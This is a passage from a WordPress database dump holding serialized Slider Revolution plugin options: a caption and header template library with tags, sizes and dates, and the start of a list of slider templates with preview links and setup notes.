09:07:08\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:388;a:13:{s:2:\"id\";s:3:\"318\";s:6:\"handle\";s:21:\"james-dodson_dark.jpg\";s:5:\"video\";s:21:\"james-dodson_dark.mp4\";s:4:\"name\";s:17:\"james-dodson_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:17:\"james-dodson_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-21 09:07:08\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:389;a:13:{s:2:\"id\";s:3:\"317\";s:6:\"handle\";s:23:\"robert_sanders_dark.jpg\";s:5:\"video\";s:23:\"robert_sanders_dark.mp4\";s:4:\"name\";s:19:\"robert_sanders_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:19:\"robert_sanders_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-21 09:07:08\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:390;a:13:{s:2:\"id\";s:3:\"316\";s:6:\"handle\";s:21:\"emily_carney_dark.jpg\";s:5:\"video\";s:21:\"emily_carney_dark.mp4\";s:4:\"name\";s:17:\"emily_carney_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:17:\"emily_carney_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-21 09:07:08\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:391;a:13:{s:2:\"id\";s:3:\"315\";s:6:\"handle\";s:22:\"michael-smith_dark.jpg\";s:5:\"video\";s:22:\"michael-smith_dark.mp4\";s:4:\"name\";s:18:\"michael-smith_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:18:\"michael-smith_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-21 09:07:08\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:392;a:13:{s:2:\"id\";s:3:\"314\";s:6:\"handle\";s:23:\"sandra_johnson_dark.jpg\";s:5:\"video\";s:23:\"sandra_johnson_dark.mp4\";s:4:\"name\";s:19:\"sandra_johnson_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:19:\"sandra_johnson_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-21 09:07:08\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:393;a:13:{s:2:\"id\";s:3:\"313\";s:6:\"handle\";s:22:\"robert_bolton_dark.jpg\";s:5:\"video\";s:22:\"robert_bolton_dark.mp4\";s:4:\"name\";s:18:\"robert_bolton_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:18:\"robert_bolton_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-21 09:07:08\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:394;a:13:{s:2:\"id\";s:3:\"312\";s:6:\"handle\";s:25:\"elegant_captions_dark.png\";s:5:\"video\";s:25:\"elegant_captions_dark.mp4\";s:4:\"name\";s:21:\"elegant_captions_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:21:\"elegant_captions_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-18 14:41:45\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:395;a:13:{s:2:\"id\";s:3:\"311\";s:6:\"handle\";s:19:\"Caption_Dark_06.png\";s:5:\"video\";s:19:\"Caption_Dark_06.mp4\";s:4:\"name\";s:15:\"Caption_Dark_06\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:15:\"Caption_Dark_06\";s:5:\"width\";s:3:\"414\";s:6:\"height\";s:3:\"225\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:396;a:13:{s:2:\"id\";s:3:\"310\";s:6:\"handle\";s:19:\"Header_Light_02.png\";s:5:\"video\";s:19:\"Header_Light_02.mp4\";s:4:\"name\";s:15:\"Header_Light_02\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:15:\"Header_Light_02\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:397;a:13:{s:2:\"id\";s:3:\"309\";s:6:\"handle\";s:21:\"Columns_4_Dark_01.png\";s:5:\"video\";s:21:\"Columns_4_Dark_01.mp4\";s:4:\"name\";s:17:\"Columns_4_Dark_01\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:17:\"Columns_4_Dark_01\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:398;a:13:{s:2:\"id\";s:3:\"308\";s:6:\"handle\";s:18:\"Header_Dark_01.png\";s:5:\"video\";s:18:\"Header_Dark_01.mp4\";s:4:\"name\";s:14:\"Header_Dark_01\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:14:\"Header_Dark_01\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:399;a:13:{s:2:\"id\";s:3:\"307\";s:6:\"handle\";s:19:\"Caption_Dark_03.png\";s:5:\"video\";s:19:\"Caption_Dark_03.mp4\";s:4:\"name\";s:15:\"Caption_Dark_03\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:15:\"Caption_Dark_03\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:400;a:13:{s:2:\"id\";s:3:\"306\";s:6:\"handle\";s:21:\"Columns_3_Dark_01.png\";s:5:\"video\";s:21:\"Columns_3_Dark_01.mp4\";s:4:\"name\";s:17:\"Columns_3_Dark_01\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:17:\"Columns_3_Dark_01\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:401;a:13:{s:2:\"id\";s:3:\"305\";s:6:\"handle\";s:19:\"Caption_Dark_05.png\";s:5:\"video\";s:19:\"Caption_Dark_05.mp4\";s:4:\"name\";s:15:\"Caption_Dark_05\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:15:\"Caption_Dark_05\";s:5:\"width\";s:4:\"1104\";s:6:\"height\";s:3:\"600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:402;a:13:{s:2:\"id\";s:3:\"304\";s:6:\"handle\";s:20:\"Caption_Light_06.png\";s:5:\"video\";s:20:\"Caption_Light_06.mp4\";s:4:\"name\";s:16:\"Caption_Light_06\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:16:\"Caption_Light_06\";s:5:\"width\";s:3:\"828\";s:6:\"height\";s:3:\"450\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:403;a:13:{s:2:\"id\";s:3:\"303\";s:6:\"handle\";s:19:\"Header_Light_01.png\";s:5:\"video\";s:19:\"Header_Light_01.mp4\";s:4:\"name\";s:15:\"Header_Light_01\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:15:\"Header_Light_01\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:404;a:13:{s:2:\"id\";s:3:\"302\";s:6:\"handle\";s:20:\"Caption_Light_03.png\";s:5:\"video\";s:20:\"Caption_Light_03.mp4\";s:4:\"name\";s:16:\"Caption_Light_03\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:16:\"Caption_Light_03\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:405;a:13:{s:2:\"id\";s:3:\"301\";s:6:\"handle\";s:19:\"Caption_Dark_01.png\";s:5:\"video\";s:19:\"Caption_Dark_01.mp4\";s:4:\"name\";s:15:\"Caption_Dark_01\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:15:\"Caption_Dark_01\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:406;a:13:{s:2:\"id\";s:3:\"300\";s:6:\"handle\";s:21:\"PromoCode_Dark_01.png\";s:5:\"video\";s:21:\"PromoCode_Dark_01.mp4\";s:4:\"name\";s:17:\"PromoCode_Dark_01\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:17:\"PromoCode_Dark_01\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:407;a:13:{s:2:\"id\";s:3:\"299\";s:6:\"handle\";s:19:\"Caption_Dark_02.png\";s:5:\"video\";s:19:\"Caption_Dark_02.mp4\";s:4:\"name\";s:15:\"Caption_Dark_02\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:15:\"Caption_Dark_02\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:408;a:13:{s:2:\"id\";s:3:\"298\";s:6:\"handle\";s:18:\"Header_Dark_02.png\";s:5:\"video\";s:18:\"Header_Dark_02.mp4\";s:4:\"name\";s:14:\"Header_Dark_02\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:14:\"Header_Dark_02\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:409;a:13:{s:2:\"id\";s:3:\"297\";s:6:\"handle\";s:22:\"Columns_3_Light_01.png\";s:5:\"video\";s:22:\"Columns_3_Light_01.mp4\";s:4:\"name\";s:18:\"Columns_3_Light_01\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:18:\"Columns_3_Light_01\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:410;a:13:{s:2:\"id\";s:3:\"296\";s:6:\"handle\";s:20:\"Caption_Light_01.png\";s:5:\"video\";s:20:\"Caption_Light_01.mp4\";s:4:\"name\";s:16:\"Caption_Light_01\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:16:\"Caption_Light_01\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:411;a:13:{s:2:\"id\";s:3:\"295\";s:6:\"handle\";s:19:\"Caption_Dark_04.png\";s:5:\"video\";s:19:\"Caption_Dark_04.mp4\";s:4:\"name\";s:15:\"Caption_Dark_04\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:15:\"Caption_Dark_04\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:412;a:13:{s:2:\"id\";s:3:\"294\";s:6:\"handle\";s:20:\"Caption_Light_02.png\";s:5:\"video\";s:20:\"Caption_Light_02.mp4\";s:4:\"name\";s:16:\"Caption_Light_02\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:16:\"Caption_Light_02\";s:5:\"width\";s:3:\"828\";s:6:\"height\";s:3:\"450\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:413;a:13:{s:2:\"id\";s:3:\"293\";s:6:\"handle\";s:20:\"Caption_Light_04.png\";s:5:\"video\";s:20:\"Caption_Light_04.mp4\";s:4:\"name\";s:16:\"Caption_Light_04\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:16:\"Caption_Light_04\";s:5:\"width\";s:4:\"1104\";s:6:\"height\";s:3:\"600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:414;a:13:{s:2:\"id\";s:3:\"292\";s:6:\"handle\";s:22:\"Columns_4_Light_01.png\";s:5:\"video\";s:22:\"Columns_4_Light_01.mp4\";s:4:\"name\";s:18:\"Columns_4_Light_01\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:18:\"Columns_4_Light_01\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:415;a:13:{s:2:\"id\";s:3:\"291\";s:6:\"handle\";s:20:\"Caption_Light_05.png\";s:5:\"video\";s:20:\"Caption_Light_05.mp4\";s:4:\"name\";s:16:\"Caption_Light_05\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:16:\"Caption_Light_05\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:416;a:13:{s:2:\"id\";s:3:\"290\";s:6:\"handle\";s:22:\"PromoCode_Light_01.png\";s:5:\"video\";s:22:\"PromoCode_Light_01.mp4\";s:4:\"name\";s:18:\"PromoCode_Light_01\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:18:\"PromoCode_Light_01\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}}s:4:\"tags\";a:18:{i:28;a:3:{s:2:\"id\";s:2:\"28\";s:6:\"handle\";s:11:\"abstraction\";s:4:\"name\";s:11:\"Abstraction\";}i:1;a:3:{s:2:\"id\";s:1:\"1\";s:6:\"handle\";s:11:\"accessories\";s:4:\"name\";s:11:\"Accessories\";}i:5;a:3:{s:2:\"id\";s:1:\"5\";s:6:\"handle\";s:3:\"art\";s:4:\"name\";s:3:\"Art\";}i:20;a:3:{s:2:\"id\";s:2:\"20\";s:6:\"handle\";s:5:\"Beach\";s:4:\"name\";s:5:\"Beach\";}i:21;a:3:{s:2:\"id\";s:2:\"21\";s:6:\"handle\";s:4:\"City\";s:4:\"name\";s:4:\"City\";}i:25;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}i:2;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:16;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}i:26;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}i:18;a:3:{s:2:\"id\";s:2:\"18\";s:6:\"handle\";s:4:\"misc\";s:4:\"name\";s:4:\"Misc\";}i:4;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}i:19;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}i:23;a:3:{s:2:\"id\";s:2:\"23\";s:6:\"handle\";s:5:\"Night\";s:4:\"name\";s:5:\"Night\";}i:3;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}i:24;a:3:{s:2:\"id\";s:2:\"24\";s:6:\"handle\";s:6:\"People\";s:4:\"name\";s:6:\"People\";}i:22;a:3:{s:2:\"id\";s:2:\"22\";s:6:\"handle\";s:3:\"Sky\";s:4:\"name\";s:3:\"Sky\";}i:29;a:3:{s:2:\"id\";s:2:\"29\";s:6:\"handle\";s:5:\"space\";s:4:\"name\";s:5:\"Space\";}i:27;a:3:{s:2:\"id\";s:2:\"27\";s:6:\"handle\";s:5:\"sport\";s:4:\"name\";s:5:\"Sport\";}}}','no'),(286304,'revslider-templates-check','1618711418','yes'),(286305,'revslider-templates-hash','59f46d12063ba904b3328974378381d8','yes'),(286306,'rs-templates-new','','no');
INSERT INTO `wp_options` VALUES (286307,'rs-templates','a:3:{s:4:\"hash\";s:32:\"8c2658e3da83c5377242600123ca6603\";s:6:\"slider\";a:506:{i:0;a:22:{s:2:\"id\";s:1:\"1\";s:5:\"title\";s:16:\"Classic Carousel\";s:5:\"alias\";s:16:\"classic-carousel\";s:3:\"zip\";s:20:\"classic-carousel.zip\";s:3:\"uid\";s:32:\"146a01dd380c0cdee85c4456ee68cd84\";s:3:\"img\";s:27:\"classic-carousel/slider.jpg\";s:7:\"preview\";s:56:\"http://revolution.themepunch.com/carousel-slider-plugin/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.0.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"600\";s:11:\"description\";s:141:\"<span class=\"ttm_content\">Our classic, full-width carousel example. Drag, swipe or click to navigate!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:284:\"<span class=\"ttm_content\">This is a \"Default\" content carousel. Just edit the slides to change images and texts.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:15:\"Revolution Base\";s:6:\"filter\";a:1:{i:0;s:8:\"carousel\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-22 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:1;a:22:{s:2:\"id\";s:1:\"2\";s:5:\"title\";s:14:\"Classic Slider\";s:5:\"alias\";s:13:\"classicslider\";s:3:\"zip\";s:17:\"classicslider.zip\";s:3:\"uid\";s:32:\"a0d6a9248c9066b404ba0f1cdadc5cf2\";s:3:\"img\";s:24:\"classicslider/slider.jpg\";s:7:\"preview\";s:61:\"http://revolution.themepunch.com/wordpress-slideshow-gallery/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.0.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"600\";s:11:\"description\";s:136:\" <span class=\"ttm_content\">A classic slideshow example with timer, bullets and arrow navigation.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:282:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Just edit the slides to change images and texts.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:15:\"Revolution Base\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:2;a:22:{s:2:\"id\";s:1:\"3\";s:5:\"title\";s:12:\"Content Tabs\";s:5:\"alias\";s:11:\"contenttabs\";s:3:\"zip\";s:15:\"contenttabs.zip\";s:3:\"uid\";s:32:\"e02e91604b690123a3d07a65582c4fd0\";s:3:\"img\";s:22:\"contenttabs/slider.jpg\";s:7:\"preview\";s:63:\"http://revolution.themepunch.com/wordpress-content-tabs-slider/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.0.5\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"600\";s:11:\"description\";s:170:\" <span class=\"ttm_content\">An auto-size slider with a cool split-text animation effect. Navigate with vertical bullets and thumbs.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:282:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Just edit the slides to change images and texts.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:15:\"Revolution Base\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:3;a:22:{s:2:\"id\";s:1:\"4\";s:5:\"title\";s:13:\"Facebook Feed\";s:5:\"alias\";s:13:\"facebook-feed\";s:3:\"zip\";s:17:\"facebook-feed.zip\";s:3:\"uid\";s:32:\"5506431d5b1babcb25dcf52c508d42e3\";s:3:\"img\";s:24:\"facebook-feed/slider.jpg\";s:7:\"preview\";s:57:\"http://revolution.themepunch.com/wordpress-facebook-feed/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"5.0.5\";s:5:\"width\";s:3:\"800\";s:6:\"height\";s:3:\"600\";s:11:\"description\";s:174:\"<span class=\"ttm_content\"> This slider is automatically populated by a Facebook stream. Just one slide is needed to show a whole feed!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:415:\"<span class=\"ttm_content\">The content source is set to <a href=\"https://www.themepunch.com/slider-revolution/module-content/#flickr\" target=\"_blank\">\"Facebook Stream\"</a>. Make sure to input your correct API information in the slider settings.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:15:\"Revolution Base\";s:6:\"filter\";a:2:{i:0;s:6:\"slider\";i:1;s:11:\"socialmedia\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 